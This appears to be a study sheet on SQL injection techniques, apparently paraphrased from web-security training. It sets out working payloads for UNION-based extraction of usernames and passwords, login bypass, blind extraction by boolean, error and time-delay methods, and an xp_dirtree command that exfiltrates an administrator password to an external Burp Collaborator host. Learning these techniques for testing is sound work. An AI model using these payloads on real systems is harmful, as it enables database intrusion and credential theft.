SQLi
====

Detect:

Test against every entry point in the application. Like submit-

1. single quote character ' and look for errors or other anomalies. 
2. Boolean conditions such as OR 1=1 and OR 1=2, and look for differences in the application's responses. 

In SQL query, test in WHERE and ORDER BY clause.

-

Exploits:

1. Retrieving hidden data

ex: https://insecure-website.com/products?category=Gifts'--

backend SQL: SELECT * FROM products WHERE category = 'Gifts' AND released = 1

2. Subverting application logic

On login page, type username as administrator'-- and leave pass blank.

3. Retrieving data from other database tables using UNION

https://insecure-website.com/products?category=Gifts' UNION SELECT username, password FROM users--

For proper transmission, it should be URL-encoded as:
https://insecure-website.com/products?category=Gifts%27%20UNION%20SELECT%20username,%20password%20FROM%20users--


3.1 For a UNION query to work, two key requirements must be met:

a. The individual queries must return the same number of columns.
b. For a UNION query to work, the second requirement is that the data types in each corresponding column of the individual queries must be able to work together. 
This means the database should be able to compare or convert the data types without errors, even if they aren't exactly the same 
(e.g., INT and FLOAT are compatible because the database can handle conversions between them).

To check these two requirements are met, find out:

1. How many columns are being returned from the original query.
2. Which columns returned from the original query are of a suitable data type to hold the results from our injected query.

1.1 Two effective methods to determine how many columns are being returned from the original query-

First method involves injecting a series of ORDER BY clauses and incrementing the specified column index until an error occurs. 

ex:
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
etc.

The column in an ORDER BY clause can be specified by its index, so you don't need to know the names of any columns. 

When the specified column index exceeds the number of actual columns in the result set, the database returns an error.
The application might actually return the database error in its HTTP response, but it may also issue a generic error response. 
In other cases, it may simply return no results at all. 

1.2 Second method involves submitting a series of UNION SELECT payloads specifying a different number of null values.

ex:
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
etc.

If the number of nulls does not match the number of columns, the database returns an error.
When the number of nulls matches the number of columns, the database returns an additional row in the result set, containing null values in each column. 
Or it could also show this error: NullPointerException.

We use NULL as it is convertible to every common data type, so it maximizes the chance that the payload will succeed when the column count is correct. 

Both methods won't work, if there is no response.


3.2 Finding columns with a useful data type

After you determine the number of required columns, you can probe each column to test whether it can hold string data. 
You can submit a series of UNION SELECT payloads that place a string value into each column in turn. 
For example, if the query returns four columns, you would submit: 

' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--

If the column data type is not compatible with string data, the injected query will cause a database error.
If an error does not occur, and the application's response contains some additional content including the injected string value, 
then the relevant column is suitable for retrieving string data. 


a. Querying the database type and version:

Database type 	Query
Microsoft, MySQL 	SELECT @@version
Oracle 	SELECT * FROM v$version
PostgreSQL 	SELECT version() 

ex: ' UNION SELECT @@version--

[URL encode the injected query when testing]

b. Listing the contents of the database

Non-Oracle:

SELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'Users'

Oracle:

SELECT * FROM all_tables
SELECT * FROM all_tab_columns WHERE table_name = 'USERS'


4. Retrieving multiple values within a single column

In some cases the original query may only return a single column.
You can retrieve multiple values together within this single column by concatenating the values together.
For example, on Oracle you could submit the input:

' UNION SELECT username || '~' || password FROM users--

This uses the double-pipe sequence || which is a string concatenation operator on Oracle. 
The injected query concatenates together the values of the username and password fields, separated by the ~ character. 


5. Second-order SQL injection

First-order SQL injection occurs when the application processes user input from an HTTP request and incorporates the input into a SQL query in an unsafe way.

Second-order SQL injection occurs when the application takes user input from an HTTP request and stores it into a database, but no vulnerability occurs at the 
point where the data is stored. 
Later, when handling a different HTTP request, the application retrieves the stored data and incorporates it into a SQL query in an unsafe way. 
For this reason, second-order SQL injection is also known as stored SQL injection. 


6. Blind SQLi 

It is when an attacker sends SQL queries to a database and infers information from the application's response behavior because they cannot see the actual query output.

UNION attacks are not effective with blind SQLi vulnerabilities as they rely on being able to see the results of the injected query within the application's responses.

6.1 Exploiting blind SQLi by triggering conditional responses

ex:

Requests to the application include a cookie header like this:

Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4

When a request containing a TrackingId cookie is processed, the application uses a SQL query to determine whether this is a known user:

SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4'


This query is vulnerable to SQL injection, but the results from the query are not returned to the user. 
However, the application does behave differently depending on whether the query returns any data. 
If you submit a recognized TrackingId, the query returns data and you receive a "Welcome back" message in the response.

This behavior is enough to be able to exploit the blind SQL injection vulnerability. 

We can exploit the vuln by adding conditional statement like this to check for password 1 letter at a time, provided if we know already know the 
table and column names and user as 'admin':

First send:
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'admin'), 1, 1) > 'm

This returns the "Welcome back" message, indicating that the injected condition is true, and so the first character of the password is greater than m. 

{
First 1: The starting position in the string (1-based indexing, meaning the first character of the password).
Second 1: The length of the substring to extract (1 character in this case).
}

Then send:
xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'admin'), 1, 1) > 't

This does not return the "Welcome back" message, indicating that the injected condition is false, and so the first character of the password is not greater than t. 

this is how we will find the password for admin.


6.2 Error-based SQL injection

6.2.1 Exploiting blind SQLi by triggering conditional errors

In the prev example, we could get atleast "Welcome back" msg that helped us to inject our query and find out if our conditon was true.
In this case, there is no reflection of either true or false output.

Therefore, we will induce error in the app so that we know when our injected query is true or false and retrieve sensitive data.

To see how this works, suppose that two requests are sent containing the following TrackingId cookie values in turn:

xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a

With the first input, the CASE expression evaluates to 'a', which does not cause any error.
With the second input, it evaluates to 1/0, which causes a divide-by-zero error.

If the error causes a difference in the application's HTTP response, you can use this to determine whether the injected condition is true.
Using this technique, you can retrieve data by testing one character at a time:

xyz' AND (SELECT CASE WHEN (Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') THEN 1/0 ELSE 'a' END FROM Users)='a


6.2.2 Extracting sensitive data via verbose SQL error messages

In this case, the verbose error msg due to db misconfig may show the SQL query being used and occasionally, show the data itself.
This effectively turns otherwise blind SQLi vulnerabilities into visible ones.

a. Can induce error by injecting a single quote into a parameter

b. You can use the CAST() function to achieve this. It enables you to convert one data type to another. 

For example, imagine a query containing the following statement:

CAST((SELECT example_column FROM example_table) AS int)

Often, the data that you're trying to read is a string. 
Attempting to convert this to an incompatible data type, such as an int, may cause an error similar to the following:

ERROR: invalid input syntax for type integer: "Example data"

This type of query may also be useful if a character limit prevents you from triggering conditional responses.


6.3 Exploiting blind SQLi by triggering time delays

In case, the app is not reflecting any message like "Welcome back", and you are not able to induce error, then this technique can be used.

If the application catches database errors when the SQL query is executed and handles them gracefully, there won't be any difference in the application's response. 
This means the previous technique for inducing conditional errors will not work. 

In this situation, it is often possible to exploit the blind SQL injection vulnerability by triggering time delays depending on whether an injected condition is true or false. 
As SQL queries are normally processed synchronously by the application, delaying the execution of a SQL query also delays the HTTP response. 
This allows you to determine the truth of the injected condition based on the time taken to receive the HTTP response. 

{
Synchronous Processing

    Waits for Completion: The application pauses until the database finishes the SQL query and returns results.
    Delays HTTP Response: Query delays (e.g., SLEEP(5)) directly slow down the HTTP response, revealing true/false conditions.
    Common in Web Apps: Most web apps (e.g., PHP, Java) use synchronous queries for simplicity and data consistency.

Asynchronous Processing

    Non-Blocking: The application sends the query and continues other tasks, handling results later via callbacks.
    No HTTP Delay: Query delays don’t affect HTTP response time, making time-based blind SQL injection ineffective.
}

The techniques for triggering a time delay are specific to the type of database being used. 
For example, on Microsoft SQL Server, you can use the following to test a condition and trigger a delay depending on whether the expression is true:

'; IF (1=2) WAITFOR DELAY '0:0:10'--
'; IF (1=1) WAITFOR DELAY '0:0:10'--

    The first of these inputs does not trigger a delay, because the condition 1=2 is false.
    The second input triggers a delay of 10 seconds, because the condition 1=1 is true.


Using this technique, we can retrieve data by testing one character at a time: 

'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--

[This SQL query counts the number of rows in the Users table where the Username is 'Administrator'. It returns a single value representing that count, typically 1 if the user exists, or 0 if not.]


6.4 Exploiting blind SQLi using out-of-band (OAST) techniques
[OAST = Out-of-Band Application Security Testing]

An application might carry out the same SQL query as the previous example but do it asynchronously.

Meaning:
The application sends the SQL query to the database in a separate thread and continues processing the user's request without waiting for the query to complete, 
so the WAITFOR DELAY does not affect the main thread's HTTP response time.
The application's HTTP response is sent before the query (and its delay) finishes, meaning the response time or content doesn’t reflect whether the condition 
(e.g., SUBSTRING(Password, 1, 1) > 'm') is true or false.

The application's response doesn't depend on the query returning any data, a database error occurring, or on the time taken to execute the query. 

In this situation, it is often possible to exploit the blind SQL injection vulnerability by triggering out-of-band network interactions to a system that you control. 
These can be triggered based on an injected condition to infer information one piece at a time. 
More usefully, data can be exfiltrated directly within the network interaction.

A variety of network protocols can be used for this purpose, but typically the most effective is DNS (domain name service). 
Many production networks allow free egress of DNS queries, because they're essential for the normal operation of production systems. 

{
What is Free Egress of DNS Queries and Why is DNS Preferred?

Free Egress of DNS Queries: This means production networks often allow DNS queries to exit the network without strict filtering, as they are critical for 
resolving domain names to IP addresses for normal system operations.

DNS Preferred - Common Allowance: DNS traffic is rarely blocked or heavily monitored in most networks, making it a reliable channel for 
out-of-band SQL injection to send data to an attacker-controlled server via DNS lookups.

DNS Preferred - Data Exfiltration: DNS allows attackers to encode/embed data (e.g., password characters) in subdomain queries 
(like password_a.attacker.com), which are logged on the attacker’s DNS server, enabling effective data extraction even in blind SQL injection scenarios.
}

The easiest and most reliable tool for using out-of-band techniques is Burp Collaborator. 
This is a server that provides custom implementations of various network services, including DNS. 
It allows you to detect when network interactions occur as a result of sending individual payloads to a vulnerable application

The techniques for triggering a DNS query are specific to the type of database being used. 
For example, the following input on Microsoft SQL Server can be used to cause a DNS lookup on a specified domain: 

'; exec master..xp_dirtree '//0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net/a'--

This causes the database to perform a lookup for the following domain:

0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net

Having confirmed a way to trigger out-of-band interactions, you can then use the out-of-band channel to exfiltrate data from the vulnerable application. 
For example: 

'; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='Administrator');exec('master..xp_dirtree "//'+@p+'.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net/a"')--

This input reads the password for the Administrator user, appends a unique Collaborator subdomain, and triggers a DNS lookup. 
This lookup allows you to view the captured password: 

S3cure.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net

Out-of-band (OAST) techniques are a powerful way to detect and exploit blind SQL injection, 
due to the high chance of success and the ability to directly exfiltrate data within the out-of-band channel. 
For this reason, OAST techniques are often preferable even in situations where other techniques for blind exploitation do work. 

-
